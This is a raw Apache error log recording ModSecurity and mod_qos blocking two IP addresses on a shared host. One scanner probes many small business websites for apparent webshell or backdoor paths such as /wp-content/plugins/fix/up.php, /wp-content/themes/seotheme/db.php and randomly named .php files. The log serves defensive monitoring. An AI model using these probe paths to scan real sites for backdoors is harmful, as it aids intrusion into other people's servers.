[Tue May 26 19:59:17.664449 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztAgAAAHY
[Tue May 26 19:59:17.670496 2026] [security2:error] [pid 93576:tid 93804] [client 45.92.1.17:58651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPWDRMqfxdEDkosztAwAAAFw"]
[Tue May 26 19:59:17.670926 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253hQAAAZE
[Tue May 26 19:59:17.671560 2026] [security2:error] [pid 93868:tid 94260] [client 45.92.1.17:58649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253hwAAAZE"], referer: www.google.com
[Tue May 26 19:59:17.672728 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253hgAAAcQ
[Tue May 26 19:59:17.679371 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztBwAAADM
[Tue May 26 19:59:17.681233 2026] [security2:error] [pid 93868:tid 94265] [client 45.92.1.17:58650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253iQAAAZY"], referer: www.google.com
[Tue May 26 19:59:17.686033 2026] [security2:error] [pid 93576:tid 93812] [client 45.92.1.17:58529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkosztCAAAAGQ"], referer: www.google.com
[Tue May 26 19:59:17.690831 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253igAAAZ4
[Tue May 26 19:59:17.708981 2026] [security2:error] [pid 93868:tid 94367] [client 45.92.1.17:58554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253iwAAAfw"], referer: www.google.com
[Tue May 26 19:59:17.724559 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253jAAAAdk
[Tue May 26 19:59:17.731433 2026] [security2:error] [pid 93576:tid 93787] [client 45.92.1.17:58679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPWDRMqfxdEDkosztCQAAAEs"]
[Tue May 26 19:59:17.732128 2026] [security2:error] [pid 93576:tid 93797] [client 45.92.1.17:58676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-plain.php"] [unique_id "ahWuPWDRMqfxdEDkosztCgAAAFU"], referer: www.google.com
[Tue May 26 19:59:17.733335 2026] [security2:error] [pid 93576:tid 93803] [client 45.92.1.17:58684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkosztCwAAAFs"], referer: www.google.com
[Tue May 26 19:59:17.762347 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253jgAAAbM
[Tue May 26 19:59:17.766324 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztEQAAAFQ
[Tue May 26 19:59:17.767644 2026] [security2:error] [pid 93576:tid 93771] [client 45.92.1.17:58694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWuPWDRMqfxdEDkosztEwAAADs"]
[Tue May 26 19:59:17.773343 2026] [security2:error] [pid 93576:tid 93772] [client 45.92.1.17:58695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWuPWDRMqfxdEDkosztFAAAADw"]
[Tue May 26 19:59:17.775459 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztFQAAAF0
[Tue May 26 19:59:17.779548 2026] [security2:error] [pid 93576:tid 93813] [client 45.92.1.17:58626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-plain.php"] [unique_id "ahWuPWDRMqfxdEDkosztFgAAAGU"], referer: www.google.com
[Tue May 26 19:59:17.799698 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztFwAAAFg
[Tue May 26 19:59:17.810001 2026] [security2:error] [pid 93576:tid 93838] [client 45.92.1.17:58709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWuPWDRMqfxdEDkosztGAAAAH4"]
[Tue May 26 19:59:17.812429 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztGQAAAHc
[Tue May 26 19:59:17.819581 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253jwAAAcY
[Tue May 26 19:59:17.822669 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253kAAAAck
[Tue May 26 19:59:17.828680 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztGgAAADM
[Tue May 26 19:59:17.848913 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253kQAAAfs
[Tue May 26 19:59:17.854379 2026] [security2:error] [pid 93868:tid 94317] [client 45.92.1.17:58661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/btfdzdzr.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253kgAAAco"], referer: www.google.com
[Tue May 26 19:59:17.862173 2026] [security2:error] [pid 93576:tid 93812] [client 45.92.1.17:58757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuPWDRMqfxdEDkosztGwAAAGQ"]
[Tue May 26 19:59:17.874336 2026] [security2:error] [pid 93576:tid 93811] [client 45.92.1.17:58761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPWDRMqfxdEDkosztHAAAAGM"]
[Tue May 26 19:59:17.875118 2026] [security2:error] [pid 93868:tid 94273] [client 45.92.1.17:58765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253kwAAAZ4"], referer: www.google.com
[Tue May 26 19:59:17.877137 2026] [security2:error] [pid 93576:tid 93803] [client 45.92.1.17:58760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-plain.php"] [unique_id "ahWuPWDRMqfxdEDkosztHwAAAFs"], referer: www.google.com
[Tue May 26 19:59:17.877196 2026] [security2:error] [pid 93576:tid 93787] [client 45.92.1.17:58768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkosztHgAAAEs"], referer: www.google.com
[Tue May 26 19:59:17.877854 2026] [security2:error] [pid 93576:tid 93776] [client 45.92.1.17:58777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkosztIAAAAEA"], referer: www.google.com
[Tue May 26 19:59:17.882593 2026] [core:error] [pid 93576:tid 93781] [client 45.92.1.17:58769] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 19:59:17.882611 2026] [core:error] [pid 93576:tid 93781] [client 45.92.1.17:58769] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 19:59:17.883448 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253lgAAAd4
[Tue May 26 19:59:17.889485 2026] [security2:error] [pid 93868:tid 94332] [client 45.92.1.17:58779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253lwAAAdk"]
[Tue May 26 19:59:17.916838 2026] [qos:error] [pid 93868:tid 94267] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253mQAAAZg
[Tue May 26 19:59:17.920222 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztKAAAAHY
[Tue May 26 19:59:17.921301 2026] [security2:error] [pid 93576:tid 93730] [client 45.92.1.17:58691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/xxadrxok.php"] [unique_id "ahWuPWDRMqfxdEDkosztKQAAABI"], referer: www.google.com
[Tue May 26 19:59:17.924192 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztKgAAABE
[Tue May 26 19:59:17.952285 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztLAAAAGs
[Tue May 26 19:59:17.955006 2026] [security2:error] [pid 93576:tid 93758] [client 45.92.1.17:58698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/kzsujzli.php"] [unique_id "ahWuPWDRMqfxdEDkosztLQAAAC4"], referer: www.google.com
[Tue May 26 19:59:17.956897 2026] [security2:error] [pid 93576:tid 93823] [client 45.92.1.17:58871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPWDRMqfxdEDkosztLgAAAG8"], referer: www.google.com
[Tue May 26 19:59:17.958273 2026] [security2:error] [pid 93868:tid 94281] [client 45.92.1.17:58870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-plain.php"] [unique_id "ahWuPUqK9k_ZUB2Vp253mgAAAaY"], referer: www.google.com
[Tue May 26 19:59:17.960103 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztLwAAAFU
[Tue May 26 19:59:17.961457 2026] [security2:error] [pid 93576:tid 93804] [client 45.92.1.17:58720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/rbgwxtam.php"] [unique_id "ahWuPWDRMqfxdEDkosztMAAAAFw"], referer: www.google.com
[Tue May 26 19:59:17.965164 2026] [security2:error] [pid 93576:tid 93776] [client 45.92.1.17:58872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPWDRMqfxdEDkosztMQAAAEA"]
[Tue May 26 19:59:17.967329 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253nAAAAak
[Tue May 26 19:59:17.971459 2026] [security2:error] [pid 93576:tid 93838] [client 45.92.1.17:58874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/bcwvgwfr.php"] [unique_id "ahWuPWDRMqfxdEDkosztMgAAAH4"], referer: www.google.com
[Tue May 26 19:59:17.973417 2026] [qos:error] [pid 93868:tid 94310] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253ngAAAcM
[Tue May 26 19:59:17.977433 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPWDRMqfxdEDkosztMwAAAHc
[Tue May 26 19:59:18.000440 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPUqK9k_ZUB2Vp253nwAAAaA
[Tue May 26 19:59:18.002856 2026] [security2:error] [pid 93868:tid 94375] [client 45.92.1.17:58929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253oAAAAgQ"], referer: www.google.com
[Tue May 26 19:59:18.003397 2026] [security2:error] [pid 93576:tid 93755] [client 45.92.1.17:58928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-plain.php"] [unique_id "ahWuPmDRMqfxdEDkosztNgAAACs"], referer: www.google.com
[Tue May 26 19:59:18.005891 2026] [security2:error] [pid 93868:tid 94313] [client 45.92.1.17:58931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253owAAAcY"]
[Tue May 26 19:59:18.006022 2026] [security2:error] [pid 93576:tid 93751] [client 45.92.1.17:58734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-plain.php"] [unique_id "ahWuPmDRMqfxdEDkosztOAAAACc"], referer: www.google.com
[Tue May 26 19:59:18.006288 2026] [security2:error] [pid 93576:tid 93738] [client 45.92.1.17:58737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greattusker.com"] [uri "/wp-plain.php"] [unique_id "ahWuPmDRMqfxdEDkosztOQAAABo"], referer: www.google.com
[Tue May 26 19:59:18.021386 2026] [security2:error] [pid 93868:tid 94273] [client 45.92.1.17:58940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/ascfszyz.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253qAAAAZ4"], referer: www.google.com
[Tue May 26 19:59:18.037828 2026] [qos:error] [pid 93868:tid 94267] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253qgAAAZg
[Tue May 26 19:59:18.067353 2026] [security2:error] [pid 93868:tid 94380] [client 45.92.1.17:58954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWuPkqK9k_ZUB2Vp253rQAAAgk"]
[Tue May 26 19:59:18.067379 2026] [security2:error] [pid 93868:tid 94331] [client 45.92.1.17:58956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWuPkqK9k_ZUB2Vp253rAAAAdg"]
[Tue May 26 19:59:18.069800 2026] [security2:error] [pid 93868:tid 94326] [client 45.92.1.17:58795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/hibsxhes.php"] [unique_id "ahWuPkqK9k_ZUB2Vp253rgAAAdM"], referer: www.google.com
[Tue May 26 19:59:18.070910 2026] [qos:error] [pid 93868:tid 94371] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPkqK9k_ZUB2Vp253rwAAAgA
[Tue May 26 19:59:18.072356 2026] [security2:error] [pid 93576:tid 93792] [client 45.92.1.17:58344] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahWuPWDRMqfxdEDkoszsvgAAAFA"], referer: www.google.com
[Tue May 26 19:59:18.073859 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztPgAAAFU
[Tue May 26 19:59:18.075401 2026] [security2:error] [pid 93576:tid 93763] [client 45.92.1.17:58831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/obzaldgp.php"] [unique_id "ahWuPmDRMqfxdEDkosztPwAAADM"], referer: www.google.com
[Tue May 26 19:59:18.077076 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztQAAAAEY
[Tue May 26 19:59:18.078257 2026] [security2:error] [pid 93576:tid 93804] [client 45.92.1.17:58967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-plain.php"] [unique_id "ahWuPmDRMqfxdEDkosztQQAAAFw"], referer: www.google.com
[Tue May 26 19:59:18.101123 2026] [security2:error] [pid 93576:tid 93838] [client 45.92.1.17:58989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuPmDRMqfxdEDkosztQgAAAH4"], referer: www.google.com
[Tue May 26 19:59:18.104970 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPmDRMqfxdEDkosztQwAAAHc
